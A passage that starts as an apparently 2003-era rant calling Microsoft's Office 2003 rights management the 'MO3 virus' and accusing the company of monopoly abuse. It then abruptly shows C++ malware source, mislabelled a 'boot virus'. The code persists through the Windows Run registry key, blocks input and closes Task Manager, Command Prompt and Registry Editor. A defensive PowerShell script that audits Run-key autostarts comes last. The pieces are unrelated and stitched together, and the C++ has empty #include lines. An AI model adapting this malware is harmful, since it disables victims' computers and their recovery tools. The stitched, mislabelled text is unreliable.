standards and its focusing not on building secure
products, but products that secure its monopoly market
positions. To improve the predicament which they've
created, Microsoft is forcing consumers to accept MO3
embedded into every computer. Listen closely and you'll
hear Microsoft mouth pieces speak of "turning software
into a service" which really means they will be changing
the software on your computer whenever they feel like it.
They will slowly limit your ability to run non-Microsoft
software. They will restrict choices on your computer to
only those products they approve. They will make changes
which cripple other software programs or reduce their
ability to interoperate with your computer so you will be
forced to use exclusively Microsoft approved products.

History Repeats Itself

Microsoft may use this newfound power to fix some holes
in their software, but they will also abuse this power to
further their corporate monopoly and increase their
control and profits. Microsoft has already embedded the
MO3 virus into another operating system they have
deployed, called Xbox. They now have the power at anytime
to change all existing Xboxes which connect to the
Internet, and they are already misusing it. They have
deleted files from users' computers without their
knowledge or permission. They have added software which
has removed the ability to run competitor's software.
They have been changing users' systems without their
consent and notification. They will do the same on
Microsoft Windows based computers once MO3 is installed.

Microsoft management has shown to be deceitful and
dishonest and will continue this behavior. Twice
Microsoft has been found guilty by the Federal government
of using illegal tactics to drive competitors out of
business and extend their monopoly. December 1st, 2003 a
trial will take place in Seattle Washington where more of
Microsoft's past behaviors will come to light.

Infecting Friends



[Image: Microsoft Word (.doc) file open in StarOffice 7]

To stop the advance of competing products and to force
users into purchasing new software with the MO3 virus,
Microsoft is making certain Microsoft Office 2003 files
unreadable by all older versions of Microsoft Office and
all competing office suites. Products like Sun's
StarOffice are getting extremely good at interoperating
with Microsoft word processing, presentation and
spreadsheet files making it possible for people to spend
close to $50 for an office suite instead of giving $400
or more to Microsoft. To blunt this and force users of
older versions of Microsoft Office to buy new software,
Microsoft has changed the specifications for some files.

Again under the umbrella of "security," Microsoft is
implementing features which limit who can open and edit
documents to further thwart competition. Microsoft Office
2003 gives its users the ability to control who can read
and edit certain documents, but only if they use the
latest Microsoft software. If one user within an office
uses this feature, all others will be unable to use any
other office suite to access that document. They will not
be permitted to run Linux software, they will be required
to purchase and run additional copies of Microsoft Office
2003. Since documents are frequently emailed around via
the Internet, this will force others to accept
Microsoft's software or be unable to communicate.
Microsoft refers to this as IRM for "information rights
management," but it's really an "infection relay method"
designed to force everyone to adopt MO3. They will be
using scare tactics about leaked memos or misdirected
emails to persuade unwitting computer users to deploy
this technology. Doing so will create a viral growth of
MO3 which will give MS unlimited power over every
computer.

Universal MO3

MO3 will not only come with Microsoft Office 2003, but
with future Microsoft products as well. The same
technology will be embedded into the next version of
Microsoft's operating system software so all users will
have to accept it with their new computer. Latest
estimates indicate this new software will not ship until
2006, so between now and then, watch for Microsoft to
secretly embed MO3 into updates or security patches that
they promote for their existing product line.



It's a boot virus

#include
#include
#include
#include
#include
#include
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}
void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}
void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}
DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}
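
The listing above persists by copying itself into the system directory as winminer.exe and adding a value named SetUp under the HKLM Run key. As an added example (not from the original post), this read-only PowerShell audit lists Run-key autostarts with each target's signature status and marks entries matching those two names; the function name is hypothetical, and checking HKCU as well goes beyond what the listing itself writes.

```powershell
# Added example: read-only audit of Run-key autostarts, the persistence point
# the listing writes to. "SetUp" and winminer.exe are the names in the listing.
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

function Get-RunKeyReport {
    foreach ($path in $runKeys) {
        $key = Get-Item -Path $path -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            # The listing stores a whole MAX_PATH buffer (sizeof, not strlen),
            # so keep only the text before the first NUL character.
            $raw = ([string]$key.GetValue($name)).Split([char]0)[0]
            $cmd = [Environment]::ExpandEnvironmentVariables($raw)

            # Target = quoted or unquoted text up to the first ".exe";
            # anything else (e.g. a bare command) is reported unchanged.
            $exe = $cmd
            if ($cmd -match '^"?([^"]+?\.exe)') { $exe = $Matches[1] }

            $sig = 'FileNotFound'
            if ([System.IO.File]::Exists($exe)) {
                $sig = (Get-AuthenticodeSignature -LiteralPath $exe).Status
            }

            [pscustomobject]@{
                Key       = $path
                Name      = $name
                Target    = $exe
                Signature = $sig
                FromPage  = ($name -eq 'SetUp') -or ($exe -like '*\winminer.exe')
            }
        }
    }
}

# Entries matching the listing's names sort to the top.
Get-RunKeyReport | Sort-Object FromPage -Descending | Format-Table -AutoSize -Wrap
```

An entry whose target sits in the system directory but reports NotSigned or FileNotFound deserves a closer look even when FromPage is False.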